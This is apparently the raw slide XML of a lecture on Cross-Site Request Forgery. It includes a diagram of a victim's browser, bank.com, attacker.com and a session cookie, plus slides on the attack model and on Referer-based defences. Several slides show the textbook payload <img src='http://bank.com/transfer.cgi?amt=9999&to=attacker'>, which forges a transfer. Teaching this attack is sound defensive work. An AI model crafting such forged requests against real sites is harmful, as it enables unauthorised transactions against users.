            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="651" name="bank.com"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17298072" y="8479192"/>
            <a:ext cx="3637475" cy="2678907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
          </a:blipFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" dist="127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4400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="654" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7976260" y="4251227"/>
            <a:ext cx="9485712" cy="2452268"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="9485710" cy="2452267"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="652" name="&lt;img src=“http://bank.com/transfer.cgi?amt=9999&amp;to=attacker”&gt;"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20828879">
              <a:off x="269929" y="1015336"/>
              <a:ext cx="9215780" cy="143693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FFF200">
                <a:alpha val="28000"/>
              </a:srgbClr>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defRPr sz="3200">
                  <a:latin typeface="Courier"/>
                  <a:ea typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                  <a:sym typeface="Courier"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr sz="2800" dirty="0"/>
                <a:t>&lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2800" dirty="0" err="1"/>
                <a:t>img</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2800" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2800" dirty="0" err="1"/>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2800" dirty="0"/>
                <a:t>=“http://</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2800" dirty="0" err="1"/>
                <a:t>bank.com</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2800" dirty="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2800" dirty="0" err="1"/>
                <a:t>transfer.cgi?amt</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2800" dirty="0"/>
                <a:t>=9999&amp;to=attacker”&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="653" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-1" y="0"/>
              <a:ext cx="9402948" cy="2090108"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1524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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="657" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7976261" y="7772290"/>
            <a:ext cx="9406063" cy="3347119"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9406061" cy="3347118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="655" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="0"/>
              <a:ext cx="9406063" cy="2289483"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="152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656" name="http://bank.com/ transfer.cgi?amt=9999&amp;to=attacker"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4327531" y="1819152"/>
              <a:ext cx="943992" cy="1527967"/>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pPr>
                <a:defRPr sz="3200">
                  <a:latin typeface="Courier"/>
                  <a:ea typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                  <a:sym typeface="Courier"/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="658" name="attacker.com"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17298072" y="3295042"/>
            <a:ext cx="3637475" cy="2678907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
          </a:blip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3600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>attacker.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="659" name="Browser automatically…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628078" y="10230331"/>
            <a:ext cx="8884092" cy="2452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l">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Browser automatically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>visits the URL to obtain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>what it believes will be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>an image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="663" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3193318" y="5889966"/>
            <a:ext cx="2211566" cy="1641650"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2211565" cy="1641649"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="660" name="Cookie"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="716217" y="936899"/>
              <a:ext cx="1495349" cy="704751"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 17039"/>
              </a:avLst>
            </a:prstGeom>
            <a:blipFill rotWithShape="1">
              <a:blip r:embed="rId6"/>
              <a:srcRect/>
              <a:tile tx="0" ty="0" sx="100000" sy="100000" flip="none" algn="tl"/>
            </a:blipFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="25400" dist="25400" dir="2388334" rotWithShape="0">
                <a:srgbClr val="000000">
                  <a:alpha val="7931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2600">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Cookie</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="661" name="bank.com"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1841193" cy="704750"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 17039"/>
              </a:avLst>
            </a:prstGeom>
            <a:blipFill rotWithShape="1">
              <a:blip r:embed="rId3"/>
              <a:srcRect/>
              <a:tile tx="0" ty="0" sx="100000" sy="100000" flip="none" algn="tl"/>
            </a:blipFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="63500" dist="127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a:defRPr sz="2200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:ea typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                  <a:sym typeface="Courier"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>bank.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="668" name="Connection Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="261332" y="710405"/>
              <a:ext cx="295731" cy="467972"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="5400000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="10800000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="16200000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="19751" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="19751" y="21600"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4582" y="20125"/>
                    <a:pt x="-1849" y="12925"/>
                    <a:pt x="457" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="88900" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
              <a:headEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664" name="Cookie"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="774622">
            <a:off x="11444326" y="10112468"/>
            <a:ext cx="1495348" cy="704750"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 17039"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
          </a:blipFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="25400" dist="25400" dir="2388334" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="7931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defRPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="667" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="19151150" y="6097640"/>
            <a:ext cx="1469030" cy="2257862"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1469028" cy="2257860"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="665" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-1" y="-1"/>
              <a:ext cx="2" cy="2257862"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200"/>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="666" name="$$$"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="254273" y="676492"/>
              <a:ext cx="1214756" cy="9048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p>
              <a:r>
                <a:t>$$$</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CC6B035-D5C2-2648-D5BE-CC962A2E9235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="880201">
            <a:off x="5725185" y="8871475"/>
            <a:ext cx="12188282"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3200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://bank.com/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>transfer.cgi?amt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=9999&amp;to=attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92EC0DBF-2277-DC0D-244C-970CB9F21140}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761820" y="2831187"/>
            <a:ext cx="5373265"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000" b="1" i="1" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>Confused deputy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Curved Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7470093A-513D-689B-C563-B60B14C60603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3648462" y="3544889"/>
            <a:ext cx="1186040" cy="1586058"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="381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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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6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6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6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animBg="1" advAuto="0"/>
      <p:bldP spid="654" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="657" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="659" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="663" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="664" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="667" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="3"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0" name="Cross-Site Request Forgery"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="514095">
              <a:defRPr sz="9856"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="671" name="Target: User who has an account on a vulnerable server…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3647102" y="3156622"/>
            <a:ext cx="17089796" cy="9336129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="574145" indent="-574145" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="4650"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: User who has an account on a vulnerable server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574145" indent="-574145" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="4650"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack goal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: make requests to the server </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>via the user’s browser</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> that look to the server like the user intended to make them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574145" indent="-574145" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="4650"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker tools</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: ability to get the user to “click a link” crafted by the attacker that goes to the vulnerable site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574145" indent="-574145" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="4650"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key tricks</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="989618" lvl="1" indent="-576233" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="4278"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Requests to the web server have predictable structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="989618" lvl="1" indent="-576233" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="4278"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Use of something like </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>=…&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> to force the victim to send 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6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7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67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6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 grpId="0" build="p"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CSRF protections: REFERER"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="496570">
              <a:defRPr sz="9520"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>CSRF protections: REFERER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="674" name="The browser will set the REFERER field to the page that hosted a clicked link"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>The browser will set the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>REFERER</a:t>
            </a:r>
            <a:r>
              <a:t> field to the page that hosted a clicked link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="675" name="Screen Shot 2014-02-18 at 3.20.48 AM.png" descr="Screen Shot 2014-02-18 at 3.20.48 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940446" y="4901029"/>
            <a:ext cx="18502965" cy="5828079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="676" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3215331" y="10160958"/>
            <a:ext cx="6446357" cy="480751"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18545"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent5"/>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677" name="Trust requests from pages a user could legitimately reach…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11068476" y="8942275"/>
            <a:ext cx="11102108" cy="3825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617361" indent="-617361" algn="l">
              <a:spcBef>
                <a:spcPts val="4200"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4700" b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Trust requests from pages a user could legitimately reach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1064106" lvl="1" indent="-619606" algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4700"/>
            </a:pPr>
            <a:r>
              <a:t>From good users, if referrer header present, generally trusted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1064106" lvl="1" indent="-619606" algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4700"/>
            </a:pPr>
            <a:r>
              <a:t>Defends against session hijacks too</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675"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="675"/>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676"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
